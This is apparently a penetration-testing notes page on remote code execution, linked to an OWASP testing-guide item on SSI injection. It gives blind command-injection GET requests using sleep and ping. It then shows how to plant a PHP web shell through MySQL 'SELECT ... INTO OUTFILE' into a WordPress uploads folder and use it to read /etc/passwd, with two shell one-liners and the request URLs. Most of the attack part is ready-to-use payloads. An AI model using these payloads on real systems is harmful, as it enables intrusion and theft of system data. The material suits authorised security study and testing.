Skip to content

RCE attack - Remote Code Execution

OWASP 
[OWASP Web Security Testing Guide 4.2](../OWASP/index.md) > 7. Data Validation Testing > 7.8. Testing for SSI Injection
ID Link to Hackinglife Link to OWASP Description
7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . " - > and [a-zA-Z0-9] - Assess the severity of the injection.

RCE attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system.

Exploiting Blind Remote Execution Vulnerability attack in a GET request in BurpSuite (to run the queries) and Wireshark (to capture the traffic).

________
GET /script.php?c=sleep+5&ok=ok HTTP/1.1
Host 192.168.137.130
User Agent....
...
________

Also other command:

GET /script.php?c=ping+192.168.139.130+-c+5&ok=ok HTTP/1.1

Gaining a reverse shell from SQL injection

Take a wordpress installation that uses a mysql database. If you manage to login into the mysql pannel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";

Now code can be executed from the browser: 

https://example.com/blogblog/wp-content/uploads/shell.php?cmd=cat+/etc/passwd

One more example:

Select "<?php $output=shell_exec($_GET['cmd']);echo "<pre>".$output."</pre>"?>" into outfile "/var/www/https/shell.php" from mysql.user limit 1;

Now code can be executed from the browser: 

https://example.com/shell.php?cmd=cat+/etc/passwd
Last update: 2024-04-03
Created: January 18, 2023 23:33:16